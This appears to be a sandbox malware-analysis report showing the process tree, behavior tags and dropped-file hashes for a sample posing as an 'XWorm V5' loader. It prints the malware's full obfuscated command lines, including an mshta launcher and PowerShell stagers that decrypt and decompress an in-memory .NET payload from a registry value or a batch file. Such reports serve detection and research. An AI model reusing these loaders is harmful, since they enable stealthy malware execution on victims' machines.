100 PID 720 wrote to memory of 616 720 $sxr-powershell.exe 5 PID 720 wrote to memory of 684 720 $sxr-powershell.exe 7 PID 720 wrote to memory of 968 720 $sxr-powershell.exe 12 PID 720 wrote to memory of 68 720 $sxr-powershell.exe 13 PID 720 wrote to memory of 444 720 $sxr-powershell.exe 14 PID 720 wrote to memory of 636 720 $sxr-powershell.exe 15 PID 720 wrote to memory of 880 720 $sxr-powershell.exe 16 PID 720 wrote to memory of 1072 720 $sxr-powershell.exe 17 PID 720 wrote to memory of 1100 720 $sxr-powershell.exe 18 PID 720 wrote to memory of 1140 720 $sxr-powershell.exe 19 PID 720 wrote to memory of 1212 720 $sxr-powershell.exe 20 PID 720 wrote to memory of 1368 720 $sxr-powershell.exe 22 PID 720 wrote to memory of 1384 720 $sxr-powershell.exe 23 PID 720 wrote to memory of 1408 720 $sxr-powershell.exe 24 PID 720 wrote to memory of 1428 720 $sxr-powershell.exe 25 PID 720 wrote to memory of 1460 720 $sxr-powershell.exe 26 PID 720 wrote to memory of 1624 720 $sxr-powershell.exe 27 PID 720 wrote to memory of 1636 720 $sxr-powershell.exe 28 PID 720 wrote to memory of 1664 720 $sxr-powershell.exe 29 PID 720 wrote to memory of 1724 720 $sxr-powershell.exe 30 PID 720 wrote to memory of 1776 720 $sxr-powershell.exe 31 PID 720 wrote to memory of 1884 720 $sxr-powershell.exe 32 PID 720 wrote to memory of 2016 720 $sxr-powershell.exe 33 PID 720 wrote to memory of 1488 720 $sxr-powershell.exe 34 PID 720 wrote to memory of 1564 720 $sxr-powershell.exe 35 PID 720 wrote to memory of 1544 720 $sxr-powershell.exe 36 PID 720 wrote to memory of 2084 720 $sxr-powershell.exe 37 PID 720 wrote to memory of 2092 720 $sxr-powershell.exe 38 PID 720 wrote to memory of 2252 720 $sxr-powershell.exe 39 PID 720 wrote to memory of 2372 720 $sxr-powershell.exe 41 PID 720 wrote to memory of 2500 720 $sxr-powershell.exe 42 PID 720 wrote to memory of 2508 720 $sxr-powershell.exe 43 PID 720 wrote to memory of 2620 720 $sxr-powershell.exe 44 PID 720 wrote to memory of 2712 720 $sxr-powershell.exe 45 PID 720 wrote to memory of 2772 720 $sxr-powershell.exe 46 PID 720 wrote to memory of 2792 720 $sxr-powershell.exe 47 PID 720 wrote to memory of 2804 720 $sxr-powershell.exe 48 PID 720 wrote to memory of 2812 720 $sxr-powershell.exe 49 PID 720 wrote to memory of 3060 720 $sxr-powershell.exe 50 PID 720 wrote to memory of 3096 720 $sxr-powershell.exe 52 PID 720 wrote to memory of 3136 720 $sxr-powershell.exe 53 PID 720 wrote to memory of 3268 720 $sxr-powershell.exe 54 PID 720 wrote to memory of 3340 720 $sxr-powershell.exe 55 PID 720 wrote to memory of 3464 720 $sxr-powershell.exe 56 PID 720 wrote to memory of 3548 720 $sxr-powershell.exe 57 PID 720 wrote to memory of 3672 720 $sxr-powershell.exe 58 PID 720 wrote to memory of 3976 720 $sxr-powershell.exe 60 PID 720 wrote to memory of 2436 720 $sxr-powershell.exe 62 PID 720 wrote to memory of 4324 720 $sxr-powershell.exe 63 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1100
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:968
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:68
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:444
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:636
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:880
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1072
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1212
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1368 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3268
-
-
C:\Windows\$sxr-mshta.exe"C:\Windows\$sxr-mshta.exe" "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-TwfkFnoyLGWlxhzmArsw4312:tatdpKhJ=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-TwfkFnoyLGWlxhzmArsw4312:tatdpKhJ=%3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3108
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function ASDgm($hbtlH){ $jvCLB=[System.Security.Cryptography.Aes]::Create(); $jvCLB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jvCLB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jvCLB.Key=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('blz4wP7NQ0z9G5HU5qt1rBXWDUDwhPjk4R14Im6s+lY='); $jvCLB.IV=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('tyHaD0iUmC1atKVX/rbjZw=='); $bkHaC=$jvCLB.('@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@'.Replace('@', ''))(); $KdWyo=$bkHaC.('@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@'.Replace('@', ''))($hbtlH, 0, $hbtlH.Length); $bkHaC.Dispose(); $jvCLB.Dispose(); $KdWyo;}function cHftl($hbtlH){ $ZLGfO=New-Object System.IO.MemoryStream(,$hbtlH); $pEGfA=New-Object System.IO.MemoryStream; Invoke-Expression '$YNTor @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$ZLGfO,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $YNTor.CopyTo($pEGfA); $YNTor.Dispose(); $ZLGfO.Dispose(); $pEGfA.Dispose(); $pEGfA.ToArray();}function cDPce($hbtlH){ $KdWyo = [System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($hbtlH); $KdWyo = ASDgm($KdWyo); $KdWyo = [System.Text.Encoding]::('@U@T@F@8@'.Replace('@', '')).('@G@e@t@S@t@r@i@n@g@'.Replace('@', ''))($KdWyo); return $KdWyo;}function execute_function($hbtlH,$HyIWf){ $wMvLZ = @( '$gbejj = [System.Reflection.Assembly]::Load([byte[]]$hbtlH);', '$nYAXe = $gbejj.EntryPoint;', '$nYAXe.Invoke($null, $HyIWf);' ); foreach ($XGPPP in $wMvLZ) { Invoke-Expression $XGPPP };}$WwewB = cDPce('6jh9/JwNM6P3zg5yY8XZBg==');$pAwEN = cDPce('ZViCuth6vUsFE5+msWnrZo/mOl8APvimIOP0OBotRXY=');$EiozW = cDPce('e/do7iEa4WyK+N/slo150A==');$xMYjW = cDPce('0AZpRDqOSBwoRnb0ckOSHA==');if (@(get-process -ea silentlycontinue $xMYjW).count -gt 1) {exit};$AmhAI = [Microsoft.Win32.Registry]::('@L@o@c@a@l@M@a@c@h@i@n@e@'.Replace('@', '')).('@O@p@e@n@S@u@b@k@e@y@'.Replace('@', ''))($WwewB).('@G@e@t@V@a@l@u@e@'.Replace('@', ''))($pAwEN);$lPNsi=cHftl (ASDgm ([Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($AmhAI)));execute_function $lPNsi (,[string[]] ($EiozW)); "4⤵PID:2896
-
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass4⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:720 -
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /C echo [System.Diagnostics.Process]::GetProcessById(720).WaitForExit();[System.Threading.Thread]::Sleep(5000); function ASDgm($hbtlH){ $jvCLB=[System.Security.Cryptography.Aes]::Create(); $jvCLB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jvCLB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jvCLB.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('blz4wP7NQ0z9G5HU5qt1rBXWDUDwhPjk4R14Im6s+lY='); $jvCLB.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('tyHaD0iUmC1atKVX/rbjZw=='); $bkHaC=$jvCLB.("@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@".Replace("@", ""))(); $KdWyo=$bkHaC.("@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@".Replace("@", ""))($hbtlH, 0, $hbtlH.Length); $bkHaC.Dispose(); $jvCLB.Dispose(); $KdWyo;}function cHftl($hbtlH){ $ZLGfO=New-Object System.IO.MemoryStream(,$hbtlH); $pEGfA=New-Object System.IO.MemoryStream; Invoke-Expression '$YNTor @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$ZLGfO,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $YNTor.CopyTo($pEGfA); $YNTor.Dispose(); $ZLGfO.Dispose(); $pEGfA.Dispose(); $pEGfA.ToArray();}function cDPce($hbtlH){ $KdWyo = [System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($hbtlH); $KdWyo = ASDgm($KdWyo); $KdWyo = [System.Text.Encoding]::("@U@T@F@8@".Replace("@", "")).("@G@e@t@S@t@r@i@n@g@".Replace("@", ""))($KdWyo); return $KdWyo;}function execute_function($hbtlH,$HyIWf){ $wMvLZ = @( '$gbejj = [System.Reflection.Assembly]::Load([byte[]]$hbtlH);', '$nYAXe = $gbejj.EntryPoint;', '$nYAXe.Invoke($null, $HyIWf);' ); foreach ($XGPPP in $wMvLZ) { Invoke-Expression $XGPPP };}$WwewB = cDPce('6jh9/JwNM6P3zg5yY8XZBg==');$pAwEN = cDPce('ZViCuth6vUsFE5+msWnrZo/mOl8APvimIOP0OBotRXY=');$EiozW = cDPce('e/do7iEa4WyK+N/slo150A==');$xMYjW = cDPce('0AZpRDqOSBwoRnb0ckOSHA==');if (@(get-process -ea silentlycontinue $xMYjW).count -gt 1) {exit};$AmhAI = [Microsoft.Win32.Registry]::("@L@o@c@a@l@M@a@c@h@i@n@e@".Replace("@", "")).("@O@p@e@n@S@u@b@k@e@y@".Replace("@", ""))($WwewB).("@G@e@t@V@a@l@u@e@".Replace("@", ""))($pAwEN);$lPNsi=cHftl (ASDgm ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($AmhAI)));execute_function $lPNsi (,[string[]] ($EiozW)); | C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass > nul5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
PID:220 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo [System.Diagnostics.Process]::GetProcessById(720).WaitForExit();[System.Threading.Thread]::Sleep(5000); function ASDgm($hbtlH){ $jvCLB=[System.Security.Cryptography.Aes]::Create(); $jvCLB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jvCLB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jvCLB.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('blz4wP7NQ0z9G5HU5qt1rBXWDUDwhPjk4R14Im6s+lY='); $jvCLB.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('tyHaD0iUmC1atKVX/rbjZw=='); $bkHaC=$jvCLB.("@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@".Replace("@", ""))(); $KdWyo=$bkHaC.("@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@".Replace("@", ""))($hbtlH, 0, $hbtlH.Length); $bkHaC.Dispose(); $jvCLB.Dispose(); $KdWyo;}function cHftl($hbtlH){ $ZLGfO=New-Object System.IO.MemoryStream(,$hbtlH); $pEGfA=New-Object System.IO.MemoryStream; Invoke-Expression '$YNTor @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$ZLGfO,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $YNTor.CopyTo($pEGfA); $YNTor.Dispose(); $ZLGfO.Dispose(); $pEGfA.Dispose(); $pEGfA.ToArray();}function cDPce($hbtlH){ $KdWyo = [System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($hbtlH); $KdWyo = ASDgm($KdWyo); $KdWyo = [System.Text.Encoding]::("@U@T@F@8@".Replace("@", "")).("@G@e@t@S@t@r@i@n@g@".Replace("@", ""))($KdWyo); return $KdWyo;}function execute_function($hbtlH,$HyIWf){ $wMvLZ = @( '$gbejj = [System.Reflection.Assembly]::Load([byte[]]$hbtlH);', '$nYAXe = $gbejj.EntryPoint;', '$nYAXe.Invoke($null, $HyIWf);' ); foreach ($XGPPP in $wMvLZ) { Invoke-Expression $XGPPP };}$WwewB = cDPce('6jh9/JwNM6P3zg5yY8XZBg==');$pAwEN = cDPce('ZViCuth6vUsFE5+msWnrZo/mOl8APvimIOP0OBotRXY=');$EiozW = cDPce('e/do7iEa4WyK+N/slo150A==');$xMYjW = cDPce('0AZpRDqOSBwoRnb0ckOSHA==');if (@(get-process -ea silentlycontinue $xMYjW).count -gt 1) {exit};$AmhAI = [Microsoft.Win32.Registry]::("@L@o@c@a@l@M@a@c@h@i@n@e@".Replace("@", "")).("@O@p@e@n@S@u@b@k@e@y@".Replace("@", ""))($WwewB).("@G@e@t@V@a@l@u@e@".Replace("@", ""))($pAwEN);$lPNsi=cHftl (ASDgm ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($AmhAI)));execute_function $lPNsi (,[string[]] ($EiozW)); "6⤵PID:1044
-
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass6⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:348
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1408
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1428
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1460
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1624
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:3096
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1636
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1664
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1724
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1776
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1884
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2016
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1488
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1544
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2092
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2252
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2500
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2508
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2620
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2712
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2792
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2812
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3136
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3464
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3548 -
C:\Users\Admin\AppData\Local\Temp\X-Worm-V5-main\XWorm V5.0\XWormLoader.exe"C:\Users\Admin\AppData\Local\Temp\X-Worm-V5-main\XWorm V5.0\XWormLoader.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe"C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1148 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 8964⤵
- Program crash
PID:848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\svchost.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function ZSHdk($KarSC){ $ZfCFn=[System.Security.Cryptography.Aes]::Create(); $ZfCFn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $ZfCFn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $ZfCFn.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('KtZKjEms98+Uz3JdAwXifcpceQe4mGFCZZetPfWLjV8='); $ZfCFn.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('XxhTpYt8KLdLDSpO7hDOxw=='); $tlguC=$ZfCFn.CreateDecryptor(); $return_var=$tlguC.TransformFinalBlock($KarSC, 0, $KarSC.Length); $tlguC.Dispose(); $ZfCFn.Dispose(); $return_var;}function CaoMW($KarSC){ $tLaFs=New-Object System.IO.MemoryStream(,$KarSC); $lDGtw=New-Object System.IO.MemoryStream; Invoke-Expression '$ixeoS #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$tLaFs,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $ixeoS.CopyTo($lDGtw); $ixeoS.Dispose(); $tLaFs.Dispose(); $lDGtw.Dispose(); $lDGtw.ToArray();}function akbWW($KarSC,$vyQOD){ $xXjIa = @( '$qtafy = [System.Reflection.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$KarSC);', '$FBuAc = $qtafy.EntryPoint;', '$FBuAc.Invoke($null, $vyQOD);' ); foreach ($eBUTc in $xXjIa) { Invoke-Expression $eBUTc };}$QCWfW=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Local\Temp\svchost.bat').Split([Environment]::NewLine);foreach ($hgEiC in $QCWfW) { if ($hgEiC.StartsWith('SEROXEN')) { $GFlqW=$hgEiC.Substring(7); break; }}$llOQb=CaoMW (ZSHdk ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($GFlqW)));akbWW $llOQb (,[string[]] ('C:\Users\Admin\AppData\Local\Temp\svchost.bat')); "4⤵PID:1604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden4⤵
- Command and Scripting Interpreter: PowerShell
- Impair Defenses: Safe Mode Boot
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2164
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3672
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3976
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2436
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4324
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4692
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:1348
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5004
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2280
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2876
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3932
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3564
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:1440
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:2080
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1148 -ip 11482⤵PID:3768
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:4340
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:852
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4856
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:2288
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:4372
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3536
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
54KB
MD5841f7a96343e4b83e4046638f97e182d
SHA111a66864411ccbe0954d72078c9cc2e67496aa63
SHA2565cf00036042741672bf3d1d413048d24446a3ebe9d44be0649497bb98a496e2e
SHA512a3e07b24b09020d2769e90ad4731d53ec384d1c71e30c84e351a01e0490fc050a5bd530806f94915c16c7fc2a841808633d949b3931f11b6e6624d5dc50c8a5b
-
Filesize
101KB
MD539d81ca537ceb52632fbb2e975c3ee2f
SHA10a3814bd3ccea28b144983daab277d72313524e4
SHA25676c4d61afdebf279316b40e1ca3c56996b16d760aa080d3121d6982f0e61d8e7
SHA51218f7acf9e7b992e95f06ab1c96f017a6e7acde36c1e7c1ff254853a1bfcde65abcdaa797b36071b9349e83aa2c0a45c6dfb2d637c153b53c66fc92066f6d4f9a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
11.9MB
MD52892f2caa15e37c12faea09c6bb5a44a
SHA18f401732b8a3a8b1022ef52836a4e7eac604146a
SHA256c5ece24bcd43419cf718605925b565c17bc668ab7d3801a1d923465b15bd9f1f
SHA51235abceb95d61ba4bfb6facc9559fe4d2db3eec9810bff4230c697864e0bd37e58ec1c1d817a766cfc07b12bed0dfedecfab01179f7295d1118347ba432ee996d
-
Filesize
283KB
